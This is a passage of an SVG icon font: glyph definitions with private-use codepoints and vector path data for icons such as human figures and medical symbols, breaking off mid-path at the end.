<glyph unicode="&#xe62f;" d="M550.827 947.491c-171.14 0-328.958-128.531-361.754-270.087-7.281-31.453-15.51-113.659-15.51-113.659l-78.599-198.421c-1.588-3.542-2.33-7.628-2.33-11.818 0-16.75 13.528-30.363 30.354-30.363h50.58v-105.402c0-82.239 66.513-148.837 148.64-148.837h59.096v-115.454h219.634v51.519h89.45v-51.519h93.409v320.15c87.768 69.017 144.206 176.302 144.206 296.594-0.005 208.417-168.777 377.297-377.175 377.297zM266.372 488.57c-23.388 0-42.374 18.953-42.374 42.35 0 23.317 18.986 42.238 42.374 42.238 23.181 0 42.2-18.921 42.2-42.238 0-23.397-19.019-42.35-42.2-42.35zM600.928 211.461h89.45v-48.386h-89.45v48.386zM600.928 280.308h89.45v-48.349h-89.45v48.349zM600.928 142.679h89.45v-48.447h-89.45v48.447zM600.928 73.827h89.45v-48.447h-89.45v48.447zM600.928 349.114h89.999c-0.174-3.546-0.564-7.036-0.564-10.672v-37.714h-89.45l0.014 48.386zM848.567 627.961c0-25.76-10.090-49.143-26.497-66.546-2.818-36.742-26.098-67.762-58.546-81.737v-0.343c-39.635-23.073-63.328-62.464-70.534-109.718h-36.639v109.615c0.244 34.168 10.992 56.052 33.515 69.547 8.244 4.74 15.74 10.165 22.115 16.173 16.722-6.003 31.523-17.788 40.918-34.544 1.959-3.297 5.472-5.153 8.929-5.153 1.677 0 3.429 0.413 4.998 1.339 5.012 2.748 6.797 8.995 3.997 13.941h-0.085c-10.541 18.751-26.563 32.594-44.774 40.833 9.338 14.345 14.533 31.448 14.289 51.98 0 0.108 0.127 0.207 0.127 0.348 0 9.272-1.376 18.3-3.847 26.784 21.396 4.082 40.246 14.937 54.117 30.222 3.842 4.228 3.57 10.714-0.686 14.496-4.223 3.809-10.611 3.467-14.383-0.653-12.081-13.148-28.4-22.143-46.94-24.614-14.904 27.606-42.613 47.212-75.095 50.787 2.161 17.507 10.071 33.13 21.941 45.018 3.913 3.983 3.913 10.484 0 14.425-3.983 4.021-10.578 4.021-14.552 0-15.219-15.214-25.37-35.544-27.925-58.175-38.146 4.805-67.528 37.188-67.612 76.622 0 5.599-4.631 10.268-10.127 10.268-5.806 0-10.339-4.669-10.339-10.268 0-6.665 0.644-13.016 1.912-19.263-14.453-12.513-32.444-18.831-50.463-18.831-8.906 0-17.821 1.583-26.248 4.636 0 0-0.127 0.033-0.24 0.070-10.372 3.748-19.879 9.695-28.122 17.934-3.95 3.983-10.47 3.983-14.491 0-4.030-3.983-4.030-10.451 0-14.463 8.436-8.417 17.948-14.937 28.090-19.649-2.034-25.515-16.858-47.456-37.601-59.782-11.983 18.202-30.011 32.622-52.158 39.664-5.519 1.719-11.264-1.273-13.016-6.661-1.508-5.397 1.235-11.128 6.698-12.814 16.459-5.219 29.668-15.351 39.189-28.263-6.388-1.714-12.946-2.64-19.916-2.64 0 0 0 0-0.103 0h-1.132c-26.29 0-50.467-10.47-68.044-27.61-4.162-3.95-4.27-10.442-0.174-14.458 1.959-2.067 4.636-3.091 7.417-3.091 2.335 0 4.909 0.963 6.905 2.884 13.946 13.599 32.965 21.805 53.906 21.805h1.24c49.312 0 90.276 36.718 96.698 84.306 7.004-1.513 14.017-2.33 21.119-2.33 20.024 0 40.208 6.214 57.212 18.507 6.224-14.181 16.036-26.577 27.963-36.197-12.156-14.975-19.301-32.759-21.189-50.951-5.115 0.822-10.508 1.273-15.9 1.273-15.454 0-31.143-3.673-45.746-11.475-4.998-2.645-6.905-8.864-4.256-13.876 1.855-3.401 5.458-5.388 9.127-5.388 1.686 0 3.204 0.371 4.678 1.235 11.753 6.149 24.041 9.066 36.197 9.066 5.425 0 10.785-0.587 15.9-1.682 2.236-20.743 11.198-41.035 26.61-57.175 2.062-2.123 4.707-3.157 7.346-3.157 2.508 0 5.12 0.925 7.145 2.809 4.195 3.955 4.293 10.376 0.315 14.463h-0.075c-13.702 14.491-20.945 32.89-21.424 51.51 0 0.272 0.075 0.474 0 0.789 0 0.371 0 0.756 0 1.127 0 18.075 6.243 35.929 18.615 50.284 13.016-6.482 27.85-10.268 43.543-10.268 0 0 0.070-0.033 0.174-0.033 0 0 0.070 0 0.16 0 42.515-0.132 76.913-34.482 77.087-76.993-8.070 2.128-16.379 3.227-24.895 3.227-12.194 0-24.543-2.231-36.469-7.145-5.289-2.161-7.793-8.103-5.67-13.317 2.161-5.223 8.032-7.76 13.293-5.632 9.545 3.809 19.263 5.67 28.846 5.67 7.727 0 15.379-1.17 22.566-3.401-2.513-11.466-7.422-20.668-15.031-28.841-0.587-0.517-1.132-1.104-1.588-1.79-5.829-5.74-12.833-11.024-21.495-16.271-29.64-17.309-43.844-48.696-43.548-87.162v-109.615h-34.952v104.227c0 38.287-24.003 74.592-54.22 87.505-14.421 5.594-29.461 14.97-40.415 27.23-15.623-10.616-34.365-16.863-54.53-16.863-20.226 0-38.968 6.153-54.497 16.694-15.459-10.165-34.097-16.102-54.051-16.102-54.831 0-99.168 44.431-99.168 99.201 0 40.941 24.759 76.067 60.186 91.178 9.582 43.684 48.278 76.373 94.842 76.373 2.475 0 4.749-0.207 7.041-0.352 17.544 25.656 47.043 42.477 80.459 42.477 16.539 0 32.068-4.115 45.7-11.471 15.383 10.235 33.787 16.177 53.596 16.177 25.45 0 48.631-9.916 66.006-26.023 7.281 1.752 14.792 2.781 22.664 2.781 39.316 0 73.315-23.66 88.491-57.551 39.903-12.086 68.956-49.11 68.956-92.93 0-8.793-1.165-17.267-3.321-25.342 12.415-16.351 19.898-36.747 19.898-58.894z" />
<glyph unicode="&#xe630;" d="M12.946 381.971h641.451v-60.12h-641.451v60.12zM516.401 508.369c0 42.054 34.102 76.081 76.081 76.081 41.942 0 76.133-34.027 76.133-76.081 0-41.923-34.191-76.11-76.133-76.11-41.984-0.005-76.081 34.191-76.081 76.11zM419.117 587.109h-254.868l-151.547-23.2v-131.546l76.481-0.033c-6.069 9.813-9.747 21.269-9.747 33.614 0 35.511 28.869 64.38 64.376 64.38h139.569l113.138 23.641 6.266-30.048-116.243-24.28h-142.74c-18.615 0-33.689-15.069-33.689-33.689 0-18.441 14.839-33.379 33.252-33.614l276.353-0.038c42.726 0.338 77.016 34.76 77.016 77.321 0.014 42.759-34.586 77.49-77.617 77.49zM551.006 160.444c170.022 0 307.839 137.836 307.839 307.862 0 170.040-137.813 307.867-307.839 307.867-111.146 0-208.271-59.152-262.393-147.479h128.921c36.352 30.457 83.122 48.833 134.247 48.833 115.534 0 209.206-93.687 209.206-209.23 0-115.566-93.673-209.253-209.206-209.253-32.782 0-63.666 7.76-91.286 21.194h-152.825c56.282-72.751 144.224-119.794 243.336-119.794zM551.006 946.040c-210.662 0-389.247-136.817-452.143-326.384l58.711 9.141 95.26-0.033c57.194 106.069 169.247 178.167 298.167 178.167 187.016 0 338.601-151.618 338.601-338.62 0-187.026-151.585-338.615-338.601-338.615-117.422 0-220.808 59.829-281.539 150.617h-155.695c73.207-168.922 241.377-287.171 437.234-287.171 263.121 0 476.451 213.302 476.451 476.451 0 263.107-213.33 476.447-476.447 476.447zM659.118 837.688c-1.729-6.877-7.868-11.461-14.646-11.461-1.217 0-2.461 0.132-3.673 0.474-58.138 14.5-119.883 14.5-178.077 0-8.093-2.161-16.29 2.898-18.315 10.992-2.025 8.093 2.903 16.285 11.029 18.31 62.957 15.717 129.729 15.717 192.686 0 8.093-2.029 13.016-10.221 10.996-18.315z" horiz-adv-x="1029" />
<glyph unicode="&#xe631;" d="M156.099 574.953c29.696 0 53.849-24.111 53.849-53.863 0-29.696-24.163-53.816-53.849-53.816s-53.816 24.125-53.816 53.816c-0.005 29.757 24.125 53.863 53.816 53.863zM512.991 874.67c39.095 0 70.872-31.739 70.872-70.877s-31.772-70.773-70.872-70.773c-39.067 0-70.783 31.645-70.783 70.773 0 39.133 31.716 70.877 70.783 70.877zM122.889 645.768l11.010-17.502c25.309 15.966 58.941 8.319 74.874-16.99l17.464 11.039c-22.016 34.924-68.378 45.465-103.349 23.453zM172.549 728.985l6.778-19.498c28.282 9.841 59.322-5.134 69.143-33.402l19.484 6.797c-13.594 39.006-56.405 59.674-95.406 46.103zM239.644 798.931l2.241-20.541c29.757 3.232 56.602-18.366 59.866-48.095l20.508 2.255c-4.481 41.040-41.533 70.83-82.615 66.382zM318.323 831.474c29.724-3.551 51.036-30.621 47.484-60.346l20.508-2.433c4.862 41.035-24.543 78.388-65.531 83.287l-2.461-20.508zM647.342 857.938c17.53-24.252 12.034-58.265-12.161-75.804l12.095-16.746c33.435 24.233 40.988 71.126 16.797 104.626l-16.732-12.077zM731.272 817.744c11.616-27.582-1.343-59.448-28.893-71.102l8.032-19.033c38.015 16.032 55.93 60.087 39.908 98.135l-19.047-7.999zM804.033 759.738c5.12-29.536-14.688-57.659-44.192-62.812l3.523-20.334c40.702 7.088 68.091 45.963 61.017 86.66l-20.348-3.514zM804.667 635.561l-1.113-20.602c41.242-2.241 76.626 29.456 78.933 70.726l-20.635 1.137c-1.635-29.893-27.263-52.896-57.184-51.261zM859.643 460.518c-29.945 0-54.234 24.092-54.234 53.788 0 29.705 24.28 53.788 54.234 53.788 29.921 0 54.239-24.078 54.239-53.788 0-29.696-24.322-53.788-54.239-53.788zM916.884 368.598l20.283-0.033 41.5-144.929c3.199-11.118 15.614-17.23 27.737-13.763 12.166 3.471 19.841 14.092 15.745 27.996l-42.679 148.677c-17.051 59.448-66.809 57.588-66.809 57.588h-106.036c0 0-49.716 1.86-66.809-57.588l-42.712-148.677c-4.063-13.904 3.617-24.524 15.773-27.996 12.124-3.471 24.543 2.64 27.704 13.763l41.528 144.929 20.255 0.033-55.446-193.339h225.444l-55.479 193.339zM154.981 389.172c19.423 0 30.842 7.102 31.26 60.796-19.479 0-42.43 0-61.656 0 0.446-53.699 10.846-60.796 30.396-60.796zM228.286 364.661h19.681c0 0 0-135.234 0-150.35 0-13.025 10.527-23.613 23.486-23.613 13.021 0 23.294 10.588 23.294 23.613 0 12.993 0 147.371 0 166.762 0 38.052-31.199 68.895-69.242 68.895-4.383 0-13.246 0-24.351 0 0-52.398-15.294-74.588-37.855-74.588v-60.599c6.656-2.837 11.358-9.465 11.358-17.145 0-10.301-8.253-18.784-18.554-18.784-10.339 0-18.554 8.192-18.554 18.531 0 7.727 4.641 14.303 11.292 17.15v60.637c-23.679 0-38.264 24.205-38.264 74.804-10.625 0-19.038 0-23.167 0-38.076 0-72.023-30.842-72.023-68.89 0-19.39 0-153.774 0-166.766 0-13.025 10.207-23.608 23.228-23.608 12.993 0 23.547 10.583 23.547 23.608 0 15.12 0 150.354 0 150.354h19.484v-189.407h146.643v189.398h-0.005zM621.108 616.373h-17.915v-558.785c0-22.058-17.887-39.931-39.964-39.931s-39.959 17.873-39.959 39.931v346.079h-20.475v-346.079c0-22.058-17.948-39.931-40.025-39.931s-39.931 17.873-39.931 39.931v558.785h-17.986l-0.028-206.059c0-16.84-13.664-30.49-30.495-30.49s-30.495 13.65-30.495 30.49v227.835c0 50.171 35.901 78.599 85.077 78.599h168.208c49.147 0 85.077-28.428 85.077-78.599v-227.835c0-16.84-13.66-30.49-30.49-30.49s-30.495 13.65-30.495 30.49l-0.103 206.059z" horiz-adv-x="1029" />
<glyph unicode="&#xe632;" d="M505.982 681.667c75.692 0 137.081 61.398 137.081 137.090s-61.393 137.062-137.081 137.062c-75.711 0-137.114-61.37-137.114-137.062 0.005-75.688 61.393-137.090 137.114-137.090zM686.857 639.949c-22.467 0-90.503 0-161.396 0v-128l29.677-7.27v29.677c0 19.284 17.571 36.785 49.636 15.225 45.168-30.45 93.789-203.39 41.048-196.58-25.46 3.244-39.848 15.593-67.877 17.166-22.77 1.173-22.77 10.961-22.803 23.841-0.028 12.879 0 54.23 0 54.23v23.040c-9.616 2.313-20.755 5.032-29.673 7.247v-158.287c0 0 44.497 30.25 76.316 5.604 20.056-15.602 32.628-60.495-29.44-97.080-14.317-8.713-92.281-29.342-116.759 16.579h-27.597c-12.442 0-22.533-10.17-22.533-22.607s10.091-22.57 22.533-22.57h163.444c25.819 0 46.843-21.029 46.843-46.876 0-25.856-21.029-46.848-46.843-46.848h-169.114c-5.767 0-10.496-4.724-10.496-10.566 0-5.8 4.729-10.496 10.496-10.496h169.114c25.819 0 46.843-21.029 46.843-46.885s-21.029-46.848-46.843-46.848h-197.786c-10.026 0-18.176 8.118-18.176 18.181 0 10.021 8.145 18.171 18.176 18.171h197.786c5.767 0 10.496 4.696 10.496 10.496 0 5.809-4.729 10.538-10.496 10.538h-169.114c-25.819 0-46.843 21.034-46.843 46.848 0 25.861 21.025 46.913 46.843 46.913h169.114c5.767 0 10.496 4.696 10.496 10.496s-4.729 10.529-10.496 10.529h-163.444c-32.461 0-58.88 26.433-58.88 58.927 0 32.484 26.419 58.945 58.88 58.945h36.482c0.233 0 0.433-0.13 0.67-0.13h12.409c12.069 0 11.604 12.772 11.567 12.772v182.305c-10.263-2.853-22.002-6.107-29.649-8.22v-20.15c0 0 0.033-41.346 0-54.221 0-12.879-0.102-22.677-22.798-23.855-28.006-1.569-42.384-13.912-67.896-17.166-52.722-6.8-4.059 166.135 41.007 196.589 32.056 21.565 49.697 4.059 49.697-15.225v-32.261l29.649 8.187v129.676c-68.575 0-133.027 0-154.284 0-97.010 0-183.529-78.606-183.529-175.593 0-49.389 0-391.908 0-425.076 0-33.164 26.089-60.062 59.187-60.062 33.164 0 59.992 26.899 59.992 60.062 0 38.637 0 383.265 0 383.265h49.697v-464.016h373.658v464.016h50.232c0 0 0-344.627 0-383.265 0-33.164 26.857-60.062 60.020-60.062s59.229 26.899 59.229 60.062c0 33.168 0 375.687 0 425.076-0.019 96.945-79.49 175.551-176.472 175.551z" horiz-adv-x="1019" />
<glyph unicode="&#xe633;" d="M1009.871-56.466h-90.121v152.228h-809.364v-152.228h-90.939v573.863c0 24.816 19.55 44.971 44.45 44.971v0.038c24.825 0 46.489-20.198 46.489-45.009v-312.639h809.359v221.541c0 24.825 20.255 44.986 45.112 44.986s45.004-20.161 45.004-44.986l0.009-482.764zM232.279 466.108c38.24 0 69.195-30.931 69.195-69.162 0-38.245-30.955-69.214-69.195-69.214-38.278 0-69.308 30.974-69.308 69.214 0 38.231 31.030 69.162 69.308 69.162zM301.479 273.38c0-18.808-15.271-34.126-34.116-34.126h-98.37c-18.85 0-34.079 15.318-34.079 34.126 0 18.775 15.233 34.017 34.079 34.017h98.37c18.841 0 34.116-15.243 34.116-34.017zM831.418 439.207c30.401 0 54.962-23.829 55.263-54.056l0.113-145.929h-555.393v199.938l500.017 0.047zM502.305 470.866v315.848c0 33.985-27.648 61.618-61.581 61.618-33.778 0-61.28-27.484-61.28-61.252 0-5.721-4.646-10.404-10.372-10.404-5.731 0-10.372 4.678-10.372 10.404 0 7.539-6.135 13.636-13.669 13.636-7.544 0-13.636-6.097-13.636-13.636 0-20.828 16.91-37.724 37.681-37.724 20.804 0 37.677 16.896 37.677 37.724 0 18.69 15.238 33.914 33.966 33.914 18.841 0 34.219-15.365 34.219-34.281v-315.848h27.366zM387.584 566.643h34.746c0 0 6.839 29.616 6.839 76.875 0 47.254-6.839 76.856-6.839 76.856h-88.82c0 0-7.952-23.918-7.952-76.856 0-52.947 7.952-76.875 7.952-76.875h35.342c0-0.075-0.075-0.146-0.075-0.263 0.038-0.592 1.113-57.621-36.239-95.514h24.609c31.035 41.458 30.476 91.836 30.438 95.777zM634.194 949.6v-358.048h375.714v358.048h-375.714zM666.305 868.258c0 26.422 21.33 47.785 47.87 47.785h215.989c26.422 0 47.827-21.363 47.827-47.785v-129.818h-28.987l-17.948 48.8c-1.076 2.973-3.979 4.979-7.173 4.942-3.157 0-5.97-2.043-7.060-5.017 0 0-5.092-14.383-10.071-28.54-7.614 31.922-23.707 99.342-23.707 99.342-0.86 3.57-4.162 6.027-7.802 5.806-3.716-0.188-6.689-3.044-7.098-6.694 0 0-12.335-109.817-15.872-141.26-6.426 9.629-12.814 19.287-12.814 19.287-1.419 2.081-3.762 3.34-6.318 3.34 0 0-21.593 0-29.184 0-2.973 8.173-17.906 48.8-17.906 48.8-1.118 2.973-3.979 4.974-7.173 4.937-3.204 0-6.017-2.043-7.060-5.017 0 0-5.092-14.383-10.108-28.54-7.614 31.885-23.707 99.342-23.707 99.342-0.86 3.57-4.166 6.022-7.807 5.801-3.669-0.183-6.651-3.044-7.093-6.689 0 0-12.297-109.817-15.867-141.26-6.398 9.629-12.819 19.287-12.819 19.287-1.376 2.081-3.753 3.34-6.28 3.34h-21.809v129.808h-0.023zM930.154 621.404h-215.984c-26.539 0-47.87 21.443-47.87 47.865v54.037c5.36 0 13.904 0 17.727 0 3.72-5.576 22.068-33.191 22.068-33.191 1.785-2.677 5.017-3.903 8.103-3.157 3.077 0.737 5.388 3.34 5.759 6.501 0 0 8.136 72.474 13.378 118.85 8.732-36.826 19.588-82.174 19.588-82.174 0.78-3.269 3.607-5.651 6.952-5.792 3.377-0.188 6.431 1.86 7.534 5.017 0 0 6.167 17.464 11.635 32.928 5.834-15.839 12.56-34.050 12.56-34.050 1.043-2.973 3.899-4.937 7.055-4.937 0 0 24.083 0 30.401 0 3.716-5.576 22.077-33.191 22.077-33.191 1.78-2.677 4.979-3.899 8.056-3.157 3.086 0.742 5.425 3.34 5.764 6.501 0 0 8.173 72.474 13.415 118.892 8.77-36.864 19.583-82.207 19.583-82.207 0.78-3.269 3.612-5.651 6.952-5.792 3.377-0.188 6.431 1.86 7.539 5.017 0 0 6.205 17.464 11.63 32.928 5.796-15.839 12.528-34.050 12.528-34.050 1.076-2.973 3.899-4.937 7.060-4.937h34.304v-54.037c0.019-26.417-21.391-47.865-47.813-47.865z" />
<glyph unicode="&#xe634;" d="M170.285 388.364c0 37.484 30.316 67.762 67.838 67.762 37.489 0 67.875-30.278 67.875-67.762 0-37.451-30.386-67.838-67.875-67.838-37.522-0.005-67.838 30.386-67.838 67.838zM825.56 429.869c29.846 0 53.938-23.388 54.192-53.004l0.113-143.111h-544.528v195.964l490.224 0.15zM272.624 233.867c18.413 0 33.374 14.961 33.374 33.374s-14.956 33.369-33.374 33.369h-96.477c-18.488 0-33.341-14.961-33.341-33.369 0-18.418 14.853-33.374 33.341-33.374h96.477zM912.149 93.132v-149.236h88.365v473.252c0 24.351-19.686 44.145-44.079 44.145-24.487 0-44.29-19.799-44.29-44.145v-217.201h-793.431v306.481c0 24.365-21.255 44.187-45.676 44.187v-0.038c-24.351 0-43.529-19.785-43.529-44.149v-562.528h89.205v149.236h793.436zM632.127 957.764c28.277 0 74.569-11.884 100.333-40.086l-34.722-66.692c-15.172 19.62-38.907 32.223-65.616 32.223-26.384 0-49.857-12.316-65.043-31.57l-35.408 64.564c29.813 29.828 71.018 41.561 100.455 41.561zM622.122 890.565h19.804v19.818h19.832v19.78h-19.832v19.813h-19.804v-19.813h-19.799v-19.78h19.799v-19.818zM695.705 796.038c0-35.182-28.531-63.704-63.718-63.704-35.196 0-63.704 28.531-63.704 63.704 0 35.211 28.508 63.723 63.704 63.723 35.187 0.005 63.718-28.508 63.718-63.723zM570.725 714.155c-44.539-0.235-70.346-36.38-76.166-56.794l-54.267-178.134h54.925l39.997 136.676h28.461l-39.894-136.643h216.116l-39.598 136.643h28.451l41.054-136.676h54.117l-54.474 178.134c-5.792 20.161-31.049 55.611-74.62 56.7l-124.101 0.094zM164.686 673.195c-78.209 0-141.758 63.582-141.758 141.791 0 78.219 63.54 141.829 141.758 141.829 78.172 0 141.824-63.61 141.824-141.829 0-78.209-63.657-141.791-141.824-141.791v0zM164.643 708.303c58.847 0 106.75 47.851 106.75 106.726 0 58.805-47.893 106.731-106.75 106.731-58.814 0-106.632-47.926-106.632-106.731-0.005-58.875 47.818-106.726 106.632-106.726v0zM165.409 796.277c-3.171-1.451-7.065-1.311-10.226 0.761-2.654 1.71-4.289 4.406-4.73 7.356l-0.146 82.409c0 5.904 4.801 10.667 10.667 10.667 5.886 0 10.663-4.772 10.663-10.667v0-63.934l54.662 25.746c5.275 2.546 11.644 0.254 14.158-5.064v0c2.504-5.355 0.216-11.691-5.097-14.2v0l-69.951-33.073z" horiz-adv-x="1029" />
<glyph unicode="&#xe635;" d="M990.853 448.825c0-268.212-217.429-485.641-485.632-485.641-268.212 0-485.632 217.41-485.632 485.641 0 268.222 217.401 485.651 485.632 485.651 268.203 0 485.632-217.439 485.632-485.651zM505.221 825.922c-208.27 0-377.097-168.837-377.097-377.097 0-208.261 168.818-377.116 377.097-377.116 208.27 0 377.097 168.865 377.097 377.116 0.009 208.261-168.827 377.097-377.097 377.097zM405.807 561.683c0 76.61 49.143 103.5 98.247 103.5 29.231 0 54.253-2.702 74.259-27.468 46.782-57.903-5.423-114.1-64.91-143.844-42.098-21.058-61.98-56.737-61.98-106.411v-111.142h111.095c0 0 0-1.166 0 65.508 0 100.001 64.322 74.866 111.104 137.406 63.27 84.603 49.579 179.987-36.267 247.941-98.209 77.777-209.351 39.187-240.318 18.129-25.742-17.484-116.945-82.451-99.404-222.199l107.956-0.228c0-0.009 0.218 13.065 0.218 38.808zM562.527 124.283v114.015h-111.095v-114.015h111.095z" horiz-adv-x="1015" />
<glyph unicode="&#xe636;" d="M291.258 646.943c54.652 24.463 79.158 88.628 54.652 143.247-24.463 54.652-88.722 79.125-143.374 54.652-54.728-24.463-79.233-88.614-54.69-143.266 24.496-54.699 88.759-79.135 143.412-54.634zM446.558 766.267c6.055 10.404 2.574 23.702-7.901 29.865-10.437 6.055-23.81 2.499-29.865-7.896-6.121-10.372-2.537-23.777 7.797-29.828 10.508-6.059 23.914-2.546 29.968 7.858zM647.924 882.542c6.059 10.404 2.579 23.777-7.891 29.86-10.451 6.059-23.853 2.504-29.903-7.896-6.088-10.404-2.499-23.777 7.83-29.828 10.578-6.121 23.876-2.612 29.964 7.863zM580.801 843.79c6.083 10.442 2.537 23.707-7.934 29.799-10.437 6.083-23.777 2.574-29.832-7.797-6.083-10.484-2.494-23.815 7.868-29.945 10.475-6.050 23.777-2.532 29.898 7.943zM715.048 921.285c6.055 10.404 2.537 23.74-7.863 29.898-10.47 6.022-23.843 2.461-29.936-7.934-6.055-10.442-2.541-23.777 7.901-29.828 10.437-6.088 23.806-2.574 29.898 7.863zM509.51 799.899c8.887 8.154 9.535 21.889 1.376 30.805-8.112 8.887-21.964 9.535-30.837 1.419-8.948-8.154-9.531-21.964-1.419-30.805 8.197-8.915 22.002-9.573 30.88-1.419zM446.558 725.823c6.055-10.442 2.574-23.777-7.901-29.903-10.437-6.055-23.81-2.537-29.865 7.863-6.121 10.404-2.537 23.777 7.797 29.898 10.508 6.022 23.914 2.508 29.968-7.858zM580.801 648.248c6.083-10.442 2.537-23.74-7.934-29.828-10.437-6.055-23.777-2.569-29.832 7.863-6.083 10.442-2.494 23.777 7.868 29.86 10.475 6.097 23.777 2.583 29.898-7.896zM880.927 605.414c-38.085 0-241.842 0-278.96 0-76.866 0-145.441-62.337-145.441-139.175 0-39.175 0-310.615 0-336.858 0-26.314 20.621-47.733 46.86-47.733 26.319 0 47.588 21.424 47.588 47.733 0 30.518 0 303.696 0 303.696h39.358v-486.076h127.746v131.716h40.626v-131.716h127.831v486.071h39.758c0 0 0-273.178 0-303.696 0-26.314 21.274-47.733 47.447-47.733 26.309 0 47.076 21.424 47.076 47.733 0 26.244 0 297.683 0 336.858 0.014 76.838-63.051 139.179-139.889 139.179zM652.232 554.815c-10.433-6.083-23.843-2.574-29.931 7.863-6.059 10.442-2.461 23.777 7.83 29.828 10.578 6.121 23.914 2.612 30.015-7.863 6.008-10.4 2.527-23.806-7.915-29.828zM719.365 516.026c-10.442-6.055-23.81-2.499-29.903 7.863-6.055 10.484-2.532 23.857 7.905 29.907s23.81 2.537 29.898-7.901c6.045-10.4 2.532-23.74-7.901-29.87zM509.51 692.154c8.887-8.154 9.535-21.903 1.376-30.852-8.112-8.845-21.964-9.493-30.837-1.419-8.948 8.154-9.531 22.035-1.419 30.894 8.197 8.873 22.002 9.526 30.88 1.376zM533.471 763.655c10.47-5.98 14.026-19.278 8.079-29.828-6.017-10.442-19.39-14.092-29.823-8.117-10.508 5.947-14.064 19.32-8.154 29.757 6.050 10.508 19.423 14.134 29.898 8.187zM737.585 854.335c-60.012 0-108.657-48.673-108.657-108.657 0-59.979 48.64-108.629 108.657-108.629 59.989 0 108.661 48.649 108.661 108.629 0 59.984-48.673 108.657-108.661 108.657zM683.548 817.33c6.059 10.475 19.357 14.134 29.865 8.117 10.442-6.012 14.059-19.278 8.089-29.823-6.022-10.442-19.353-14.096-29.832-8.117-10.47 6.017-14.096 19.348-8.122 29.823zM654.519 725.673c-10.47 6.017-14.059 19.39-8.15 29.828 6.059 10.508 19.39 14.134 29.898 8.117 10.475-5.98 14.064-19.245 8.009-29.79-5.942-10.475-19.32-14.129-29.757-8.154zM722.545 673.623c-6.017-10.47-19.353-14.096-29.828-8.154-10.475 6.022-14.101 19.362-8.117 29.837 6.055 10.475 19.357 14.139 29.86 8.117 10.447-5.98 14.068-19.282 8.084-29.799zM761.837 733.828c-6.017-10.47-19.353-14.129-29.828-8.15-10.503 6.017-14.059 19.39-8.112 29.785 6.055 10.55 19.39 14.172 29.86 8.154 10.4-5.98 14.134-19.315 8.079-29.79zM598.674 765.975c11.776-2.607 19.207-14.172 16.633-26.023-2.612-11.71-14.284-19.202-26.060-16.633-11.781 2.612-19.212 14.313-16.633 26.027 2.715 11.809 14.313 19.278 26.060 16.628zM629.403 678.005c11.743-2.645 19.207-14.204 16.638-26.023-2.645-11.71-14.317-19.24-26.060-16.633-11.814 2.574-19.212 14.313-16.605 26.023 2.616 11.814 14.284 19.245 26.027 16.633zM623.494 849.662c11.781-2.649 19.245-14.209 16.638-26.023-2.612-11.743-14.28-19.245-26.056-16.633-11.781 2.569-19.174 14.284-16.642 25.985 2.687 11.851 14.317 19.278 26.060 16.671zM277.598 339.010c7.797-14.43 22.941-24.069 40.697-24.069 20.081 0 37.367 11.964 44.29 29.611l82.672 242.627c8.441 24.754-4.819 51.613-29.541 60.054-24.825 8.446-51.646-4.857-60.054-29.569l-47.367-139.292-51.317 91.925c-12.142 19.099-30.659 34.36-53.779 42.116-53.497 17.868-111.301-10.977-129.174-64.442l-62.008-185.569c-4.528-11.269-7.464-31.298-7.464-41.796v-373.605h185.565v305.763l51.031 151.721 36.451-65.475z" horiz-adv-x="1029" />
<glyph unicode="&#xe637;" d="M525.115 902.684c177.904 0 320.503-146.648 320.503-324.542 0-70.261-13.594-115.43-54.328-172.474-53.971-75.006-105.923-119.489-105.923-211.827v-70.628c0-87.585-75.372-154.812-162.938-154.812-88.618 0-162.957 70.261-162.957 158.88 0 21.062 15.604 39.401 36.667 39.401 31.904 0 30.542-41.082 42.097-70.637 14.261-35.99 43.778-57.025 82.831-57.025 49.904 0 93.701 36.996 93.701 86.908v78.763c0 159.237 162.966 215.575 162.966 374.793 0 140.899-114.425 255.295-255.305 255.295-87.265 0-148.705-28.512-201.005-97.769-30.889-41.082-44.812-71.295-51.604-122.204-4.077-31.575-4.725-73.343-36.657-73.343-21.053 0-36.667 18.338-36.667 39.391-0.019 179.238 149.354 321.827 328.619 321.827zM515.598 804.925c126.3 0 234.928-96.425 234.928-222.725 0-16.281-10.86-32.571-27.159-32.571-17.662 0-21.72 20.705-24.454 38.010-6.116 38.020-9.178 62.464-29.893 95.044-33.942 53.304-83.151 70.628-146.639 70.628-60.097 0-102.87-20.038-138.531-67.885-19.353-25.825-31.443-60.331-37.54-92.254-4.754-26.145 0.554-46.277-26.258-46.277-16.638 0-25.816 17.314-25.816 33.961 0.028 122.889 98.473 224.068 221.362 224.068zM127.13 303.836l117.519-117.519-29.348-29.348-117.519 117.519 29.348 29.348zM186.261 362.941l117.539-117.539-29.355-29.355-117.539 117.539 29.355 29.355zM247.354 424.793l117.515-117.549-29.352-29.344-117.515 117.549 29.352 29.344zM318.348 493.798l117.515-117.549-29.359-29.351-117.515 117.549 29.359 29.351zM384.168 555.859l117.512-117.512-29.348-29.348-117.512 117.512 29.348 29.348zM451.070 629.010l117.522-117.555-29.359-29.351-117.522 117.555 29.359 29.351zM781.684 888.097l47.709-47.709-30.836-30.836-47.709 47.709 30.836 30.836zM843.731 950.564l47.702-47.716-30.847-30.838-47.702 47.716 30.847 30.838z" horiz-adv-x="1015" />
<glyph unicode="&#xe638;" d="M349.156-42.806h326.778v326.839h326.858v327.032h-326.858v326.816h-326.778v-326.816h-326.952v-327.032h326.952z" />
<glyph unicode="&#xe639;" d="M179.695 181.019c-36.354 0-65.838 29.493-65.838 65.829 0 36.373 29.484 65.843 65.838 65.843 36.387 0 65.847-29.469 65.847-65.843-0.005-36.345-29.46-65.829-65.847-65.829zM47.085-57.79c0 15.969 0 105.279 0 129.024 0 46.528 38.218 84.331 84.803 84.331 23.132 0 68.424 0 90.933 0 46.58 0 88.177-37.812 88.177-84.331 0-23.745 0-113.060 0-129.024h-263.914zM862.368 186.611c36.35 0 65.833 29.559 65.833 65.88 0 36.406-29.484 65.876-65.833 65.876-36.387 0-65.843-29.469-65.843-65.876 0-36.326 29.455-65.88 65.843-65.88zM994.913-57.79c0 15.969 0 105.279 0 129.024 0 46.528-38.223 84.331-84.832 84.331-23.099 0-68.325 0-90.829 0-46.651 0-88.187-37.812-88.187-84.331 0-23.745 0-113.060 0-129.024h263.848zM520.914 181.378c-36.803 0-66.602 29.578-66.602 66.050s29.8 66.065 66.602 66.065c36.77 0 66.569-29.592 66.569-66.065 0-36.477-29.8-66.050-66.569-66.050zM360.505-57.79l52.422 142.798c20.985 72.94 82.123 70.694 82.123 70.694h51.889c0 0 61.105 2.246 82.128-70.694l52.413-142.798h-320.974zM520.914 396.871v156.243l-25.935 